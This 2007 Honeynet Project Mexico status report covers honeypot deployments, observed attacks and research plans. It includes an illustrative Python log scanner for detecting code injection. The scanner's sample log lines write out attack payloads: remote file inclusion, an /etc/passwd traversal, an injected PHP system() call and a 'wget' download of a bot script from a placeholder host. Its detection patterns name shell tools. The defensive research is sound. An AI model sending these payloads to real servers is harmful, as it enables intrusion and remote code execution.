Honeynet Project Mexico
http://www.honeynet.org.mx
Bi-Annual Status Report, March 2007 - #1

1.0 DEPLOYMENTS
===============

1.1 Current technologies deployed. Describe anything that you have deployed that is collecting information, including honeynets, client honeypots, honeyd, mwcollect, or anything else honeypot related.

* The honeynets deployed are based on Honeywall Roo, with various operating systems running under VMware for virtualization.
* Honeypots:
  - Fedora Core 5
  - Ubuntu Edgy
  - Windows 2000 (it would be nice to deploy a Windows Vista honeypot as well)
* A honeypot running nepenthes to collect malware
* A honeypot running Arania to detect malicious code injection against the Mambo application server

2.0 FINDINGS
============

2.1 Highlight any unique findings, attacks, tools, or methods.

* FTP/SSH brute force attacks
* With Arania we collected different kinds of PHP code injection: PHP backdoors and shells, C code to compile an exploit, and different kinds of Perl bots.

2.2 Any trends seen in the past six months.

* A lot of malware
* A lot of FTP/SSH brute force attacks, but none successful.

3.0 LESSONS LEARNED
===================

3.1 What new positive things can you share with the community, so they can replicate your success?

3.2 What new mistakes can you share with the community, so they don't make the same mistakes?

3.3 Are there any research ideas you would like to see developed?

* Analyzing the motives and tactics of a typical attacker, which wasn't possible without the honeynet.
* Monitoring the activity of the honeynet, so that if a honeypot is compromised we can respond quickly to the incident.

4.0 TECHNOLOGY
==============

4.1 What tools or functionality are we lacking, what do we need to work on?

* None at this time

4.2 What new tools or technology are you working on?

* Arania
  Arania is a proof of concept for detecting code injection in GET requests against Mambo (it may work with other applications as well); its primary use is to download the injected code for later analysis.
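As an added illustration of the kind of check Arania performs on web server logs (example code written for this report, not Arania itself, whose source is on the project website), the Python script below parses Apache combined-format access log lines, flags GET parameters that look like remote file inclusion, directory traversal, injected PHP code or shell command execution, and records any remote URL named in the payload so the injected code can be retrieved and analysed offline. The log lines, rule patterns and IP addresses are all constructed for the example and are not taken from the honeynet's data.

```python
import re
from urllib.parse import unquote, urlsplit

# Apache "combined" access-log format:
#   host ident user [time] "METHOD URI PROTOCOL" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Detection rules: a label and a pattern tested against each decoded
# query-parameter value.  Illustrative signatures for the classes of
# attempt named in the report, not Arania's own rules.
RULES = [
    ("remote_inclusion", re.compile(r'^(?:https?|ftp)://', re.I)),
    ("directory_traversal", re.compile(r'(?:\.\./){2,}')),
    ("php_code", re.compile(r'<\?php|\b(?:eval|system|passthru|shell_exec)\s*\(', re.I)),
    ("command_execution", re.compile(r'(?:;|\|\||&&|\|)\s*(?:wget|curl|perl|sh|bash)\b', re.I)),
]

# Any URL embedded in a suspicious value is worth keeping for later analysis.
URL_RE = re.compile(r'(?:https?|ftp)://[^\s\'"<>;&|]+')

def parse_line(line):
    """Return the fields of one combined-format log line, or None if it
    does not parse (truncated or foreign lines are skipped, not guessed)."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def split_query(query):
    """Split a raw query string on '&' only and decode every value twice,
    so that double-URL-encoded payloads are still inspected in clear."""
    pairs = []
    for part in query.split('&'):
        if not part:
            continue
        name, _, value = part.partition('=')
        pairs.append((unquote(name), unquote(unquote(value))))
    return pairs

def classify_params(uri):
    """Return [(rule, param, decoded_value)] for every parameter that
    trips a rule; an empty list means the request looks benign."""
    hits = []
    for name, value in split_query(urlsplit(uri).query):
        for rule, pattern in RULES:
            if pattern.search(value):
                hits.append((rule, name, value))
    return hits

def scan_log(lines):
    """Scan log lines and return one finding per suspicious request.
    Remote URLs named in the payload are recorded (never fetched here),
    so an analyst can retrieve the injected code for study later."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        hits = classify_params(rec["uri"])
        if not hits:
            continue
        findings.append({
            "host": rec["host"],
            "time": rec["time"],
            "status": int(rec["status"]),
            "path": urlsplit(rec["uri"]).path,
            "rules": sorted({rule for rule, _, _ in hits}),
            "remote_urls": sorted({u for _, _, v in hits for u in URL_RE.findall(v)}),
        })
    return findings

def count_by_rule(findings):
    """Tally how many requests tripped each rule (the trend view)."""
    counts = {}
    for f in findings:
        for rule in f["rules"]:
            counts[rule] = counts.get(rule, 0) + 1
    return counts

# Constructed sample log lines (RFC 5737 documentation addresses), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Mar/2007:10:15:02 -0600] "GET /index.php?page=news&id=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/Mar/2007:10:15:09 -0600] "GET /index.php?page=http://203.0.113.5/shell.txt? HTTP/1.1" 200 412 "-" "libwww-perl/5.805"',
    '198.51.100.7 - - [12/Mar/2007:10:15:11 -0600] "GET /index.php?page=../../../../etc/passwd%00 HTTP/1.1" 404 288 "-" "libwww-perl/5.805"',
    '203.0.113.44 - - [12/Mar/2007:10:16:40 -0600] "GET /cgi-bin/test.cgi?cmd=id;wget%20http://203.0.113.5/bot.pl HTTP/1.1" 404 301 "-" "Mozilla/4.0"',
    '203.0.113.44 - - [12/Mar/2007:10:16:55 -0600] "GET /index.php?page=%3C%3Fphp%20system(%27id%27)%3B%20%3F%3E HTTP/1.1" 200 77 "-" "Mozilla/4.0"',
    'this line is not in combined log format and is skipped',
]

if __name__ == "__main__":
    results = scan_log(SAMPLE_LOG)
    for f in results:
        print(f["time"], f["host"], f["path"], ",".join(f["rules"]), f["remote_urls"])
    print("totals:", count_by_rule(results))
```

The query string is split on "&" by hand rather than with urllib's parse_qsl because older Python versions also split on ";", which would cut a "cmd=id;wget ..." payload in half before the rule ever sees it. Values are decoded twice so that a double-encoded payload is matched in clear, and the script only records the remote URLs it finds; fetching the referenced code for analysis is left to a separate, sandboxed step.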
  A "simple" Perl script that analyses the web server log and tries to find remote code inclusion, injection or execution attempts. The code is available on our website: http://www.honeynet.org.mx

4.3 Would you like to integrate this with any other tools, or are you looking for help or collaboration with others in testing or developing the tool?

* Honeywall

5.0 PAPERS AND PRESENTATIONS
============================

5.1 Are you working on any papers to be published, such as KYE or academic papers?

* Writing a final work for a B.D.; when the paper is finished, we plan to restructure the information and publish it as a book.

5.2 Are you looking for any data or people to help with your papers?

* Yes, all experiences and any honeypot-related data are welcome.

5.3 Where did you publish/present honeypot-related material?

Articles:
* Interview about honeypots for an open source portal: http://www.software.net.mx/desarrolladores/softwareprofesional/seguridad/Honeynetproject.htm
* Journal article about honeypots for a university e-Journal

Presentations:
* CICOL 2006, June 2006, Cuernavaca, Mexico
* CONSOL 2006, August 2006, Mexico City
* XII Simposium Internacional ISC, September 2006, Toluca, Edo. de México
* 6tas Jornadas Regionales de Software Libre, October 2006, Mendoza, Argentina
* Expo-Informática 2006, November 2006, Toluca, Edo. de México
* II CNICC 2006, December 2006, Mazatlán, Sinaloa
* CONSOL 2007, February 2007, Mexico City

6.0 ORGANIZATIONAL
==================

6.1 Changes in the structure of your organization.

* 2 members stepped down due to inactivity.
* 1 member joined the project.

6.2 Your feedback on Alliance activities.

* None at this time

6.3 Any suggestions for improving the Alliance?

* None at this time

7.0 GOALS
=========

7.1 Which of your goals did you meet for the last six months?

7.2 Which of your goals did you not meet for the last six months?
7.3 Goals for the next six months

* Working with nepenthes
* Presenting at various conferences
* Developing a visualization for honeypots
* Deploying and maintaining Honeywall-based honeynets

8.0 MISC ACTIVITIES
===================

8.1 Anything else not covered you would like to share.

* It would be nice to build a LiveCD with all the honeypot software, maybe integrating qemu for virtualization.
* Mirror of the Honeynet Project website: http://mirror.honeynet.org.mx